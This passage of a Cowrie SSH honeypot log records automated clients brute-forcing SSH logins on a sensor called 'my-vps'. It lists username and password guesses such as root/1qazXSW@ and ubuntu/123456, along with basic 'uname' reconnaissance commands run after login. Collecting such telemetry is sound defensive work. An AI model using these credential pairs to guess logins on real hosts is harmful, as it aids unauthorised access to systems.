ert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.583009Z","src_ip":"213.108.243.7","session":"997202142127"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":49818,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3eac3892fce","protocol":"ssh","message":"New connection: 217.154.1.158:49818 (1.2.3.4:22) [session: d3eac3892fce]","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.806285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.807063Z","src_ip":"217.154.1.158","session":"d3eac3892fce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.821238Z","src_ip":"217.154.1.158","session":"d3eac3892fce"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.864782Z","src_ip":"217.154.1.158","session":"d3eac3892fce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:18:39.911092Z","src_ip":"217.154.1.158","session":"d3eac3892fce"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.911822Z","src_ip":"217.154.1.158","session":"d3eac3892fce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.927536Z","src_ip":"217.154.1.158","session":"d3eac3892fce"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.928626Z","src_ip":"217.154.1.158","session":"d3eac3892fce"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e$R5t","message":"login attempt [root/1q@W3e$R5t] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:18:40.283435Z","src_ip":"213.108.243.7","session":"997202142127"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:18:40.589863Z","src_ip":"213.108.243.7","session":"997202142127"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T20:18:40.590589Z","src_ip":"213.108.243.7","session":"997202142127"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:40.698276Z","src_ip":"213.108.243.7","session":"997202142127"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:40.699554Z","src_ip":"213.108.243.7","session":"997202142127"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":42926,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3b11fd84e50","protocol":"ssh","message":"New connection: 217.154.1.158:42926 (1.2.3.4:22) [session: a3b11fd84e50]","sensor":"my-vps","timestamp":"2025-08-26T20:18:57.287814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:18:57.288552Z","src_ip":"217.154.1.158","session":"a3b11fd84e50"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:18:57.303272Z","src_ip":"217.154.1.158","session":"a3b11fd84e50"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:18:57.346137Z","src_ip":"217.154.1.158","session":"a3b11fd84e50"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:58.362806Z","src_ip":"217.154.1.158","session":"a3b11fd84e50"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59100,"dst_ip":"1.2.3.4","dst_port":22,"session":"be5bad8ba392","protocol":"ssh","message":"New connection: 212.227.235.229:59100 (1.2.3.4:22) [session: be5bad8ba392]","sensor":"my-vps","timestamp":"2025-08-26T20:19:01.836912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:19:02.476927Z","src_ip":"212.227.235.229","session":"be5bad8ba392"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:19:02.477792Z","src_ip":"212.227.235.229","session":"be5bad8ba392"}
{"eventid":"cowrie.login.success","username":"root","password":"reza-RM1234","message":"login attempt [root/reza-RM1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:19:06.833753Z","src_ip":"212.227.235.229","session":"be5bad8ba392"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:19:07.701064Z","src_ip":"212.227.235.229","session":"be5bad8ba392"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":42014,"dst_ip":"1.2.3.4","dst_port":22,"session":"17a596c1266d","protocol":"ssh","message":"New connection: 217.154.1.158:42014 (1.2.3.4:22) [session: 17a596c1266d]","sensor":"my-vps","timestamp":"2025-08-26T20:19:14.973215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:19:14.974082Z","src_ip":"217.154.1.158","session":"17a596c1266d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:19:14.995051Z","src_ip":"217.154.1.158","session":"17a596c1266d"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:19:15.055534Z","src_ip":"217.154.1.158","session":"17a596c1266d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:19:15.154769Z","src_ip":"217.154.1.158","session":"17a596c1266d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:19:15.155461Z","src_ip":"217.154.1.158","session":"17a596c1266d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:19:15.175352Z","src_ip":"217.154.1.158","session":"17a596c1266d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:19:15.176497Z","src_ip":"217.154.1.158","session":"17a596c1266d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52636,"dst_ip":"1.2.3.4","dst_port":22,"session":"c389cf964f96","protocol":"ssh","message":"New connection: 217.154.1.158:52636 (1.2.3.4:22) [session: c389cf964f96]","sensor":"my-vps","timestamp":"2025-08-26T20:19:32.467747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:19:32.468689Z","src_ip":"217.154.1.158","session":"c389cf964f96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:19:32.483032Z","src_ip":"217.154.1.158","session":"c389cf964f96"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-26T20:19:32.532053Z","src_ip":"217.154.1.158","session":"c389cf964f96"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:19:33.548249Z","src_ip":"217.154.1.158","session":"c389cf964f96"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63094,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6fbd8af6737","protocol":"ssh","message":"New connection: 217.72.205.35:63094 (1.2.3.4:22) [session: c6fbd8af6737]","sensor":"my-vps","timestamp":"2025-08-26T20:19:43.294232Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:19:43.295343Z","src_ip":"217.72.205.35","session":"c6fbd8af6737"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":37684,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cf6ed89a175","protocol":"ssh","message":"New connection: 217.154.1.158:37684 (1.2.3.4:22) [session: 5cf6ed89a175]","sensor":"my-vps","timestamp":"2025-08-26T20:19:49.402933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:19:49.403853Z","src_ip":"217.154.1.158","session":"5cf6ed89a175"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:19:49.418235Z","src_ip":"217.154.1.158","session":"5cf6ed89a175"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:19:49.463360Z","src_ip":"217.154.1.158","session":"5cf6ed89a175"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:19:50.480189Z","src_ip":"217.154.1.158","session":"5cf6ed89a175"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60734,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3c8e36f0e3c","protocol":"ssh","message":"New connection: 217.154.1.158:60734 (1.2.3.4:22) [session: a3c8e36f0e3c]","sensor":"my-vps","timestamp":"2025-08-26T20:20:06.510244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:20:06.511254Z","src_ip":"217.154.1.158","session":"a3c8e36f0e3c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:20:06.525151Z","src_ip":"217.154.1.158","session":"a3c8e36f0e3c"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:20:06.568215Z","src_ip":"217.154.1.158","session":"a3c8e36f0e3c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:20:07.584353Z","src_ip":"217.154.1.158","session":"a3c8e36f0e3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38040,"dst_ip":"1.2.3.4","dst_port":22,"session":"467ebe3dc6fc","protocol":"ssh","message":"New connection: 212.227.235.229:38040 (1.2.3.4:22) [session: 467ebe3dc6fc]","sensor":"my-vps","timestamp":"2025-08-26T20:20:19.589314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:20:20.190732Z","src_ip":"212.227.235.229","session":"467ebe3dc6fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:20:20.191364Z","src_ip":"212.227.235.229","session":"467ebe3dc6fc"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59496,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4377275d851","protocol":"ssh","message":"New connection: 217.154.1.158:59496 (1.2.3.4:22) [session: b4377275d851]","sensor":"my-vps","timestamp":"2025-08-26T20:20:23.716594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:20:23.717357Z","src_ip":"217.154.1.158","session":"b4377275d851"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01